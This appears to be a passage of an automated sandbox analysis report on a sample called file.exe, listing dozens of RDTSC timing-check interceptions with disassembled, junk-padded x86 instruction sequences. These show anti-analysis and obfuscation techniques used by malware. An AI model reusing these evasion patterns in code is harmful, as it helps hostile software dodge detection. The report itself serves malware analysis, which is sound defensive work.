Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A253CF second address: A253D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2C3EE second address: A2C3F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2F592 second address: A2F5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E94h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2F5AC second address: A2F5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F661D451443h 0x0000000b jmp 00007F661D45143Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2F5C4 second address: A2F5CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2F861 second address: A2F86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F661D451436h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2F86F second address: A2F875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2F875 second address: A2F8B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 je 00007F661D45144Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F661D451446h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2FDCD second address: A2FDEA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F661CE75E92h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2FF70 second address: A2FF74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2FF74 second address: A2FF93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jp 00007F661CE75E86h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 jmp 00007F661CE75E8Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A32B33 second address: A32B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 add dword ptr [esp], 5AB4AA60h 0x0000000c jmp 00007F661D45143Dh 0x00000011 push C5E9A9CAh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A32FD1 second address: A32FEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A337AC second address: A337B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33A7A second address: A33A84 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33A84 second address: A33A91 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33A91 second address: A33A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33A97 second address: A33A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33B68 second address: A33B72 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F661CE75E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33DD8 second address: A33DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A342BD second address: A342F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F661CE75E93h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F661CE75E97h 0x00000012 push eax 0x00000013 push edx 0x00000014 jns 00007F661CE75E86h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A342F7 second address: A342FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A354CD second address: A354D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A354D2 second address: A354E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D45143Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A365B5 second address: A36611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F661CE75E94h 0x0000000c nop 0x0000000d movzx edi, cx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F661CE75E88h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov edi, dword ptr [ebp+122D38A2h] 0x00000034 mov esi, dword ptr [ebp+122D380Ah] 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F661CE75E8Eh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A36611 second address: A36617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A36617 second address: A3661B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3702C second address: A37036 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A37036 second address: A37074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F661CE75E86h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 nop 0x00000016 cld 0x00000017 push 00000000h 0x00000019 mov si, bx 0x0000001c push 00000000h 0x0000001e jmp 00007F661CE75E8Ch 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a pop eax 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A36DDA second address: A36DFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F661D45143Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A38608 second address: A3860D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3860D second address: A38617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F661D451436h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A38308 second address: A3830C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3830C second address: A38310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EDA47 second address: 9EDA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EDA4B second address: 9EDA4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EDA4F second address: 9EDA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EDA57 second address: 9EDA61 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F661D45143Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3CFC5 second address: A3CFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F661CE75E86h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3CFD0 second address: A3CFD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3CFD7 second address: A3D029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2337h], ebx 0x00000010 xor dword ptr [ebp+122D2DA2h], ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F661CE75E88h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 movsx ebx, cx 0x00000035 mov dword ptr [ebp+122D2390h], ebx 0x0000003b push 00000000h 0x0000003d mov ebx, dword ptr [ebp+122D232Bh] 0x00000043 xchg eax, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D029 second address: A3D034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F661D451436h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D034 second address: A3D063 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F661CE75E86h 0x00000009 jmp 00007F661CE75E98h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007F661CE75E86h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D063 second address: A3D067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D067 second address: A3D06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3AB9A second address: A3AB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E035 second address: A3E098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edi 0x00000009 call 00007F661CE75E88h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], edi 0x00000013 add dword ptr [esp+04h], 00000015h 0x0000001b inc edi 0x0000001c push edi 0x0000001d ret 0x0000001e pop edi 0x0000001f ret 0x00000020 cld 0x00000021 mov ebx, dword ptr [ebp+122D3806h] 0x00000027 push 00000000h 0x00000029 jmp 00007F661CE75E95h 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D3616h] 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F661CE75E96h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EF73 second address: A3EFFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F661D451438h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov ebx, dword ptr [ebp+122D362Eh] 0x0000002d push 00000000h 0x0000002f mov di, 391Ch 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F661D451438h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov ebx, dword ptr [ebp+122D2D02h] 0x00000055 push ecx 0x00000056 xor di, C515h 0x0000005b pop edi 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 jmp 00007F661D451444h 0x00000065 pushad 0x00000066 popad 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EFFF second address: A3F006 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A400F9 second address: A400FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A400FF second address: A40187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F661CE75E88h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 pushad 0x00000026 sub dword ptr [ebp+122D2C44h], esi 0x0000002c popad 0x0000002d jp 00007F661CE75E92h 0x00000033 jp 00007F661CE75E8Ch 0x00000039 mov ebx, dword ptr [ebp+12458290h] 0x0000003f push 00000000h 0x00000041 mov edi, dword ptr [ebp+122D2E66h] 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007F661CE75E88h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 0000001Ch 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 mov bx, AA47h 0x00000067 xchg eax, esi 0x00000068 jo 00007F661CE75E94h 0x0000006e push eax 0x0000006f push edx 0x00000070 jnl 00007F661CE75E86h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D23E second address: A3D24C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D45143Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A402B9 second address: A402BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A402BF second address: A402C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4035E second address: A40362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40362 second address: A40373 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 jo 00007F661D45143Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4134A second address: A4134F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4134F second address: A41361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jl 00007F661D451436h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A42408 second address: A42437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E8Dh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F661CE75E8Ah 0x00000014 jmp 00007F661CE75E8Dh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A443CD second address: A443E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661D451441h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4557A second address: A45580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A45580 second address: A45584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A48419 second address: A48439 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F661CE75E86h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A48439 second address: A4843F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A465B1 second address: A465B6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A445B4 second address: A445C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A445C2 second address: A44635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov bx, B167h 0x0000000e mov dword ptr [ebp+1245780Bh], ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b movzx ebx, di 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 sub dword ptr [ebp+12469E52h], ecx 0x0000002b mov eax, dword ptr [ebp+122D1729h] 0x00000031 mov dword ptr [ebp+12480B20h], eax 0x00000037 movzx edi, ax 0x0000003a push FFFFFFFFh 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007F661CE75E88h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 00000014h 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 movsx ebx, si 0x00000059 nop 0x0000005a pushad 0x0000005b jmp 00007F661CE75E8Eh 0x00000060 push ecx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A44635 second address: A4464B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F661D45143Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A485CF second address: A485DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A485DB second address: A4865E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F661D451438h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push ebx 0x00000029 xor ebx, 390F0FAEh 0x0000002f pop edi 0x00000030 push dword ptr fs:[00000000h] 0x00000037 mov dword ptr [ebp+12469F33h], edi 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 mov dword ptr [ebp+122D295Eh], edi 0x0000004a mov eax, dword ptr [ebp+122D08E5h] 0x00000050 mov edi, edx 0x00000052 push FFFFFFFFh 0x00000054 call 00007F661D451446h 0x00000059 sub dword ptr [ebp+122D2A20h], ebx 0x0000005f pop edi 0x00000060 add bl, 00000030h 0x00000063 push eax 0x00000064 jg 00007F661D451448h 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4865E second address: A48662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4A3E2 second address: A4A3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4A3EB second address: A4A3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4B5E5 second address: A4B5F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F661D451436h 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4B5F8 second address: A4B60A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A53D95 second address: A53D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A53D9B second address: A53D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A53D9F second address: A53DCF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F661D451436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F661D45143Ch 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F661D451444h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A53DCF second address: A53DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A53DD5 second address: A53DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D45143Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5407C second address: A540BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F661CE75E95h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jmp 00007F661CE75E90h 0x00000013 pop esi 0x00000014 jmp 00007F661CE75E93h 0x00000019 rdtsc
